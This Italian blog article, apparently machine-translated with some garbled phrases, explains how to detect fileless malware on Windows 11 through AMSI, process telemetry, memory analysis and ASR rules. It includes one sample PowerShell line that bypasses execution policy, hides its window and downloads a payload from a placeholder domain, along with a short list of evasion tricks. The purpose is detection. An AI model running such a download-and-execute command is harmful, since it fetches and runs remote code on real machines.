Come rilevare malware pericolosi senza file in Windows 11

Ultimo aggiornamento: 23/11/2025

  • Il malware senza file opera nella memoria e sfrutta in modo improprio processi legittimi come PowerShell e WMI.
  • Per un rilevamento efficace è necessario monitorare i comportamenti e analizzare la memoria, non solo i file.
  • AMSI, telemetria di processo, regole di riduzione della superficie e ricerca proattiva sono funzionalità chiave di Windows 11.
  • La persistenza in WMI, Registro di sistema e MBR, insieme al firmware e all'USB, amplia la superficie di attacco.

Come rilevare malware pericolosi senza file

¿Come rilevare malware pericolosi senza file? L'attività di attacco senza file è cresciuta in modo significativo e, a peggiorare le cose, Windows 11 non è immuneQuesto approccio bypassa il disco e si basa sulla memoria e su strumenti di sistema legittimi; ecco perché i programmi antivirus basati su firme sono in difficoltà. Se cercate un modo affidabile per rilevarlo, la risposta sta nella combinazione di telemetria, analisi del comportamento e controlli di Windows.

Nell'ecosistema attuale, le campagne che abusano di PowerShell, WMI o Mshta coesistono con tecniche più sofisticate come le iniezioni di memoria, la persistenza "senza toccare" il disco e persino abusi del firmwareLa chiave è comprendere la mappa delle minacce, le fasi dell'attacco e quali segnali lasciano, anche quando tutto avviene all'interno della RAM.

Che cosa sono i malware fileless e perché rappresentano un problema in Windows 11?

Quando parliamo di minacce "fileless", ci riferiamo a codice dannoso che Non è necessario depositare nuovi eseguibili nel file system per funzionare. Di solito viene iniettato nei processi in esecuzione ed eseguito nella RAM, basandosi su interpreti e binari firmati da Microsoft (ad esempio, PowerShell, WMI, rundll32, mshtaCiò riduce il tuo impatto e ti consente di bypassare i motori che cercano solo file sospetti.

Anche i documenti d'ufficio o i PDF che sfruttano le vulnerabilità per avviare comandi sono considerati parte del fenomeno, perché attiva l'esecuzione in memoria senza lasciare binari utili per l'analisi. Abuso di macro e DDE In Office, poiché il codice viene eseguito in processi legittimi come WinWord.

Gli aggressori combinano l'ingegneria sociale (phishing, link spam) con trappole tecniche: il clic dell'utente avvia una catena in cui uno script scarica ed esegue il payload finale in memoria, evitando di lasciare traccia sul disco. Gli obiettivi spaziano dal furto di dati all'esecuzione di ransomware, fino al movimento laterale silenzioso.

Rilevamento malware senza file

Tipologie per impronta nel sistema: da 'puri' a ibridi

Per evitare concetti confusi, è utile separare le minacce in base al loro grado di interazione con il file system. Questa categorizzazione chiarisce cosa persiste, dove vive il codice e quali segni lascia?.

Tipo I: nessuna attività sui file

Il malware completamente privo di file non scrive nulla sul disco. Un esempio classico è lo sfruttamento di un vulnerabilità di rete (come il vettore EternalBlue di un tempo) per implementare una backdoor residente nella memoria del kernel (casi come DoublePulsar). In questo caso, tutto avviene nella RAM e non ci sono artefatti nel file system.

Un'altra opzione è quella di contaminare il firmware di componenti: BIOS/UEFI, schede di rete, periferiche USB (tecniche di tipo BadUSB) o persino sottosistemi della CPU. Persistono nonostante i riavvii e le reinstallazioni, con l'ulteriore difficoltà che Pochi prodotti ispezionano il firmwareSi tratta di attacchi complessi, meno frequenti, ma pericolosi perché furtivi e resistenti.

Tipo II: Attività di archiviazione indiretta

In questo caso, il malware non "lascia" il proprio eseguibile, ma utilizza contenitori gestiti dal sistema, essenzialmente archiviati come file. Ad esempio, backdoor che installano Comandi di PowerShell nel repository WMI e attivarne l'esecuzione con filtri di evento. È possibile installarlo dalla riga di comando senza eliminare i file binari, ma il repository WMI risiede su disco come database legittimo, rendendo difficile la pulizia senza compromettere il sistema.

Da un punto di vista pratico sono considerati fileless, perché quel contenitore (WMI, Registry, ecc.) Non è un classico eseguibile rilevabile E la sua pulizia non è banale. Il risultato: una persistenza furtiva con poche tracce "tradizionali".

Contenuti esclusivi: clicca qui  Impostazioni sulla privacy nelle applicazioni di messaggistica

Tipo III: Richiede che i file funzionino

Alcuni casi mantengono un persistenza 'senza file' A livello logico, necessitano di un trigger basato su file. L'esempio tipico è Kovter: registra un verbo shell per un'estensione casuale; quando viene aperto un file con quell'estensione, viene avviato un piccolo script che utilizza mshta.exe, che ricostruisce la stringa dannosa dal Registro di sistema.

Il trucco è che questi file "esca" con estensioni casuali non contengono un payload analizzabile e la maggior parte del codice risiede nel Iscriviti (un altro contenitore). Ecco perché sono classificati come fileless in termini di impatto, anche se, a rigor di termini, dipendono da uno o più artefatti del disco come trigger.

Vettori e 'ospiti' dell'infezione: dove entra e dove si nasconde

Per migliorare il rilevamento, è fondamentale mappare il punto di ingresso e l'ospite dell'infezione. Questa prospettiva aiuta a progettare controlli specifici Dare priorità alla telemetria appropriata.

gesta

  • Basato su file (Tipo III): Documenti, eseguibili, file Flash/Java legacy o file LNK possono sfruttare il browser o il motore che li elabora per caricare shellcode in memoria. Il primo vettore è un file, ma il payload viaggia nella RAM.
  • Basato sulla rete (Tipo I): un pacchetto che sfrutta una vulnerabilità (ad esempio, in SMB) viene eseguito nell'userland o nel kernel. WannaCry ha reso popolare questo approccio. Caricamento diretto della memoria senza nuovo file.

Hardware

  • Dispositivi (Tipo I): il firmware del disco o della scheda di rete può essere modificato e può essere introdotto del codice. Difficile da ispezionare e persiste al di fuori del sistema operativo.
  • CPU e sottosistemi di gestione (Tipo I): Tecnologie come ME/AMT di Intel hanno dimostrato percorsi per Networking ed esecuzione al di fuori del sistema operativoAttacca a un livello molto basso, con un alto potenziale di furtività.
  • USB (Tipo I): BadUSB consente di riprogrammare un'unità USB per impersonare una tastiera o una scheda di rete e avviare comandi o reindirizzare il traffico.
  • BIOS / UEFI (Tipo I): riprogrammazione dannosa del firmware (casi come Mebromi) che viene eseguita prima dell'avvio di Windows.
  • Hypervisor (Tipo I): Implementazione di un mini-hypervisor sotto il sistema operativo per nasconderne la presenza. Raro, ma già osservato sotto forma di rootkit hypervisor.

Esecuzione e iniezione

  • Basato su file (Tipo III): EXE/DLL/LNK o attività pianificate che avviano iniezioni in processi legittimi.
  • Macro (Tipo III): VBA in Office può decodificare ed eseguire payload, incluso un ransomware completo, con il consenso dell'utente tramite l'inganno.
  • Script (Tipo II): PowerShell, VBScript o JScript da file, riga di comando, servizi, registrazione o WMIL'aggressore può digitare lo script in una sessione remota senza toccare il disco.
  • Record di avvio (MBR/Boot) (Tipo II): Famiglie come Petya sovrascrivono il settore di avvio per prenderne il controllo all'avvio. È esterno al file system, ma accessibile al sistema operativo e alle soluzioni moderne in grado di ripristinarlo.

Come funzionano gli attacchi fileless: fasi e segnali

Sebbene non lascino file eseguibili, le campagne seguono una logica a fasi. Comprenderle consente il monitoraggio. eventi e relazioni tra processi che lasciano il segno.

  • Accesso inizialeAttacchi di phishing che utilizzano link o allegati, siti web compromessi o credenziali rubate. Molte catene iniziano con un documento di Office che attiva un comando. PowerShell.
  • Persistenza: backdoor tramite WMI (filtri e abbonamenti), Chiavi di esecuzione del registro o attività pianificate che riavviano gli script senza un nuovo file dannoso.
  • EsfiltrazioneUna volta raccolte, le informazioni vengono inviate fuori dalla rete tramite processi affidabili (browser, PowerShell, bitsadmin) per mixare il traffico.

Questo schema è particolarmente insidioso perché indicatori di attacco Si nascondono nella normalità: argomenti della riga di comando, concatenamento dei processi, connessioni in uscita anomale o accesso alle API di iniezione.

Tecniche comuni: dalla memoria alla registrazione

Gli attori si affidano a una gamma di metodi che ottimizzano la furtività. È utile conoscere quelli più comuni per attivare un rilevamento efficace.

  • Residente nella memoria: Caricamento dei payload nello spazio di un processo attendibile in attesa di attivazione. rootkit e hook Nel kernel, aumentano il livello di occultamento.
  • Persistenza nel RegistroSalva i blob crittografati in chiavi e reidratali da un launcher legittimo (mshta, rundll32, wscript). L'installer temporaneo può autodistruggersi per ridurre al minimo il suo impatto.
  • phishing delle credenzialiUtilizzando nomi utente e password rubati, l'attaccante esegue shell e impianti remoti accesso silenzioso nel Registro di sistema o WMI.
  • Ransomware "senza file"La crittografia e la comunicazione C2 sono gestite dalla RAM, riducendo le possibilità di rilevamento finché il danno non è visibile.
  • Kit operativi: catene automatizzate che rilevano le vulnerabilità e distribuiscono payload di sola memoria dopo che l'utente ha fatto clic.
  • Documenti con codice: macro e meccanismi come DDE che attivano comandi senza salvare gli eseguibili sul disco.
Contenuti esclusivi: clicca qui  Come bloccare e segnalare su SpikeNow?

Gli studi di settore hanno già evidenziato picchi notevoli: in un periodo del 2018, un aumento di oltre il 90% negli attacchi a catena basati su script e PowerShell, segno che il vettore è preferito per la sua efficacia.

La sfida per aziende e fornitori: perché bloccare non basta

Sarebbe allettante disabilitare PowerShell o vietare le macro per sempre, ma Interromperesti l'operazionePowerShell è un pilastro dell'amministrazione moderna e Office è essenziale in ambito aziendale; spesso il blocco cieco non è fattibile.

Inoltre, esistono modi per aggirare i controlli di base: eseguire PowerShell tramite DLL e rundll32, impacchettare gli script in file EXE, Porta la tua copia di PowerShell o addirittura nascondere script nelle immagini ed estrarli in memoria. Pertanto, la difesa non può basarsi esclusivamente sulla negazione dell'esistenza di strumenti.

Un altro errore comune è delegare l'intera decisione al cloud: se l'agente deve attendere una risposta dal server, Si perde la prevenzione in tempo realeI dati di telemetria possono essere caricati per arricchire le informazioni, ma il La mitigazione deve avvenire all'endpoint.

Come rilevare malware senza file in Windows 11: telemetria e comportamento

La strategia vincente è monitorare i processi e la memoriaNon i file. I comportamenti dannosi sono più stabili delle forme assunte da un file, il che li rende ideali per i motori di prevenzione.

  • AMSI (interfaccia di scansione antimalware)Intercetta gli script PowerShell, VBScript o JScript anche quando vengono creati dinamicamente in memoria. Ottimo per catturare stringhe offuscate prima dell'esecuzione.
  • Monitoraggio del processo: partenza/arrivo, PID, genitori e figli, percorsi, righe di comando e hash, oltre ad alberi di esecuzione per comprendere la storia completa.
  • Analisi della memoria: rilevamento di iniezioni, carichi riflettenti o PE senza toccare il disco e revisione di regioni eseguibili insolite.
  • Protezione del settore di avviamento: controllo e ripristino dell'MBR/EFI in caso di manomissione.

Nell'ecosistema Microsoft, Defender for Endpoint combina AMSI, monitoraggio del comportamentoLa scansione della memoria e l'apprendimento automatico basato su cloud vengono utilizzati per adattare i rilevamenti a varianti nuove o offuscate. Altri fornitori utilizzano approcci simili con motori residenti nel kernel.

Esempio realistico di correlazione: dal documento a PowerShell

Immagina una catena in cui Outlook scarica un allegato, Word apre il documento, il contenuto attivo è abilitato e PowerShell viene avviato con parametri sospetti. Una telemetria adeguata mostrerebbe... Riga di comando (ad esempio, ExecutionPolicy Bypass, finestra nascosta), connessione a un dominio non attendibile e creazione di un processo figlio che si installa in AppData.

Un agente con contesto locale è in grado di fermarsi e fare retromarcia attività dannose senza intervento manuale, oltre alla notifica al SIEM o tramite e-mail/SMS. Alcuni prodotti aggiungono un livello di attribuzione della causa principale (modelli di tipo StoryLine), che punta non al processo visibile (Outlook/Word), ma al thread completamente dannoso e la sua origine per ripulire completamente il sistema.

Un tipico schema di comando a cui fare attenzione potrebbe essere il seguente: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');La logica non è la stringa esatta, ma l'insieme dei segnali: bypass delle policy, finestra nascosta, cancellazione del download ed esecuzione in memoria.

AMSI, pipeline e ruolo di ciascun attore: dall'endpoint al SOC

Oltre all'acquisizione degli script, un'architettura solida orchestra i passaggi che facilitano l'indagine e la risposta. Più prove si ottengono prima di eseguire il carico, meglio è.Meglio.

  • Intercettazione dello scriptAMSI fornisce il contenuto (anche se generato al volo) per l'analisi statica e dinamica in una pipeline di malware.
  • Eventi di processoVengono raccolti PID, binari, hash, percorsi e altri dati. argomenti, stabilendo gli alberi dei processi che hanno portato al carico finale.
  • Rilevamento e segnalazioneI rilevamenti vengono visualizzati sulla console del prodotto e inoltrati alle piattaforme di rete (NDR) per la visualizzazione della campagna.
  • Garanzie per l'utenteAnche se uno script viene iniettato nella memoria, il framework AMSI lo intercetta nelle versioni compatibili di Windows.
  • Capacità di amministratore: configurazione della policy per abilitare l'ispezione degli script, blocco basato sul comportamento e creazione di report dalla console.
  • Lavoro SOC: estrazione di artefatti (UUID VM, versione del sistema operativo, tipo di script, processo iniziatore e suo padre, hash e righe di comando) per ricreare la cronologia e regole di sollevamento futuro.
Contenuti esclusivi: clicca qui  OneDrive con intelligenza artificiale: come organizzare, cercare e proteggere i tuoi file

Quando la piattaforma consente l'esportazione del buffer di memoria In associazione all'esecuzione, i ricercatori possono generare nuove rilevazioni e arricchire la difesa contro varianti simili.

Misure pratiche in Windows 11: prevenzione e caccia

Installare Windows 11 correttamente nel 2025

Oltre ad avere EDR con ispezione della memoria e AMSI, Windows 11 consente di chiudere gli spazi di attacco e migliorare la visibilità con controlli nativi.

  • Registrazione e restrizioni in PowerShellAbilita la registrazione dei blocchi di script e la registrazione dei moduli, applica modalità limitate ove possibile e controlla l'uso di Bypass/Nascosto.
  • Regole di riduzione della superficie di attacco (ASR): blocca l'avvio degli script da parte dei processi di Office e Abuso di WMI/PSExec quando non necessario.
  • Politiche macro dell'ufficio: disattiva per impostazione predefinita la firma macro interna e gli elenchi di attendibilità rigorosi; monitora i flussi DDE legacy.
  • Audit e registro WMI: monitora le sottoscrizioni agli eventi e le chiavi di esecuzione automatica (Run, RunOnce, Winlogon), nonché la creazione di attività in programma.
  • Protezione all'avvio: attiva Secure Boot, controlla l'integrità MBR/EFI e convalida che non ci siano modifiche all'avvio.
  • Rattoppatura e indurimento: chiude le vulnerabilità sfruttabili nei browser, nei componenti di Office e nei servizi di rete.
  • consapevolezza: addestra gli utenti e i team tecnici sul phishing e sui segnali di esecuzioni segrete.

Per la caccia, concentrarsi sulle query relative a: creazione di processi da parte di Office verso PowerShell/MSHTA, argomenti con stringa di download/file di downloadScript con offuscamento chiaro, iniezioni riflessive e reti in uscita verso TLD sospetti. Incrocia questi segnali con reputazione e frequenza per ridurre il rumore.

Cosa può rilevare oggi ogni motore?

Le soluzioni aziendali di Microsoft combinano AMSI, analisi comportamentale, esaminare la memoria e protezione del settore di avvio, oltre a modelli di apprendimento automatico basati su cloud per adattarsi alle minacce emergenti. Altri fornitori implementano il monitoraggio a livello di kernel per distinguere il software dannoso da quello innocuo, con rollback automatico delle modifiche.

Un approccio basato su storie di esecuzione Consente di identificare la causa principale (ad esempio, un allegato di Outlook che attiva una catena) e di mitigare l'intero albero: script, chiavi, attività e binari intermedi, evitando di rimanere bloccati sul sintomo visibile.

Errori comuni e come evitarli

Come pulire il registro di Windows senza rompere nulla

Bloccare PowerShell senza un piano di gestione alternativo non è solo poco pratico, ma ci sono anche modi per invocarlo indirettamenteLo stesso vale per le macro: o le gestisci con policy e firme, altrimenti l'azienda ne soffrirà. È meglio concentrarsi sulla telemetria e sulle regole comportamentali.

Un altro errore comune è credere che inserire le applicazioni nella whitelist risolva tutto: la tecnologia fileless si basa proprio su questo. app attendibiliIl controllo dovrebbe osservare cosa fanno e come si relazionano, non solo se è loro consentito.

Grazie a tutto quanto sopra, il malware senza file cessa di essere un "fantasma" quando si monitora ciò che conta davvero: comportamento, memoria e origini di ogni esecuzione. Combinando AMSI, una telemetria di processo avanzata, controlli nativi di Windows 11 e un livello EDR con analisi comportamentale, si ottiene un vantaggio notevole. Aggiungendo all'equazione policy realistiche per macro e PowerShell, auditing WMI/Registro di sistema e una ricerca che dà priorità a righe di comando e alberi di processo, si ottiene una difesa che interrompe queste catene prima che facciano rumore.

Articolo correlato:
reti di computer